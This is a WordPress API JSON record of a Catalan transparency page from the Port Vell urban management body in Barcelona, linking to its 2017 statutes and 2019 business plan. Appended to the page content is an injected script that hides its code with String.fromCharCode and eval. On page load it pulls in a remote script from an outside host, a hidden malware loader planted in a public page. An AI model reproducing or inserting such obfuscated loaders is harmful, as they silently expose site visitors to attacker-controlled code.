{"id":3425,"date":"2019-04-12T11:55:32","date_gmt":"2019-04-12T09:55:32","guid":{"rendered":"https:\/\/portvellbcn.cat\/?page_id=3425"},"modified":"2019-06-25T11:06:47","modified_gmt":"2019-06-25T09:06:47","slug":"estatuts","status":"publish","type":"page","link":"https:\/\/portvellbcn.cat\/ca\/estatuts\/","title":{"rendered":"Estatuts"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row][vc_column][vc_empty_space height=&#8221;70px&#8221;][vc_text_separator title=&#8221;Informaci\u00f3 Estatuts&#8221; i_icon_fontawesome=&#8221;fa fa-pencil-square-o&#8221; title_align=&#8221;separator_align_left&#8221; color=&#8221;white&#8221; i_color=&#8221;custom&#8221; add_icon=&#8221;true&#8221; i_custom_color=&#8221;#1b8fe8&#8243;][vc_column_text]El Consell d\u2019Administraci\u00f3 de la Ger\u00e8ncia Urban\u00edstica Port Vell va aprovar, el 15 de novembre de 2017, la modificaci\u00f3 dels seus Estatuts en els que, entre d\u2019altres q\u00fcestions, s\u2019exposen les tasques que l\u2019Autoritat Portu\u00e0ria de Barcelona li encomana.[\/vc_column_text][vc_tta_accordion c_icon=&#8221;triangle&#8221; c_position=&#8221;right&#8221; active_section=&#8221;-1&#8243; collapsible_all=&#8221;true&#8221;][vc_tta_section title=&#8221;Estatuts de la Ger\u00e8ncia Urban\u00edstica Port Vell&#8221; tab_id=&#8221;1553247309537-8c96750f-53d6&#8243;][vc_column_text el_class=&#8221;transparencia&#8221;]<\/p>\n<p>Podeu consultar el document en el seg\u00fcent enlla\u00e7 <a href=\"http:\/\/transparencia.portvellbcn.cat\/wp-content\/uploads\/2019\/03\/escriptura-port-vell-4053-15-novembre-2017.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Veure enlla\u00e7<\/a><\/p>\n<p>[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;Pla d\u2019Empresa 2019 &#8221; tab_id=&#8221;1553247309586-ceed9ec8-ee4f&#8221;][vc_column_text el_class=&#8221;transparencia&#8221;]Podeu consultar el Pla d\u2019Empresa 2019 en el seg\u00fcent enlla\u00e7 <a href=\"http:\/\/transparencia.portvellbcn.cat\/wp-content\/uploads\/2019\/03\/Pla-Empresa-2019.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Veure enlla\u00e7<\/a>[\/vc_column_text][\/vc_tta_section][\/vc_tta_accordion][\/vc_column][\/vc_row][vc_row][vc_column][vc_empty_space height=&#8221;120px&#8221;][\/vc_column][\/vc_row]<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row][vc_column][vc_empty_space height=&#8221;70px&#8221;][vc_text_separator title=&#8221;Informaci\u00f3 Estatuts&#8221; i_icon_fontawesome=&#8221;fa fa-pencil-square-o&#8221; title_align=&#8221;separator_align_left&#8221; color=&#8221;white&#8221; i_color=&#8221;custom&#8221; add_icon=&#8221;true&#8221; i_custom_color=&#8221;#1b8fe8&#8243;][vc_column_text]El Consell d\u2019Administraci\u00f3 de la Ger\u00e8ncia Urban\u00edstica Port Vell va aprovar, el 15 de novembre de 2017, la modificaci\u00f3 dels seus Estatuts en els que, entre d\u2019altres q\u00fcestions, s\u2019exposen les tasques que l\u2019Autoritat Portu\u00e0ria de Barcelona li encomana.[\/vc_column_text][vc_tta_accordion c_icon=&#8221;triangle&#8221; c_position=&#8221;right&#8221; active_section=&#8221;-1&#8243; collapsible_all=&#8221;true&#8221;][vc_tta_section title=&#8221;Estatuts de la Ger\u00e8ncia Urban\u00edstica Port Vell&#8221; tab_id=&#8221;1553247309537-8c96750f-53d6&#8243;][vc_column_text el_class=&#8221;transparencia&#8221;] Podeu consultar el document en el seg\u00fcent enlla\u00e7 Veure enlla\u00e7 [\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;Pla d\u2019Empresa 2019 &#8221; tab_id=&#8221;1553247309586-ceed9ec8-ee4f&#8221;][vc_column_text el_class=&#8221;transparencia&#8221;]Podeu consultar el Pla d\u2019Empresa 2019 en el seg\u00fcent enlla\u00e7 Veure enlla\u00e7[\/vc_column_text][\/vc_tta_section][\/vc_tta_accordion][\/vc_column][\/vc_row][vc_row][vc_column][vc_empty_space height=&#8221;120px&#8221;][\/vc_column][\/vc_row]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-templates\/page-creative-medium-dark.php","meta":{"_acf_changed":false,"footnotes":""},"class_list":["post-3425","page","type-page","status-publish","hentry"],"acf":[],"_links":{"self":[{"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/pages\/3425","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/comments?post=3425"}],"version-history":[{"count":0,"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/pages\/3425\/revisions"}],"wp:attachment":[{"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/media?parent=3425"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}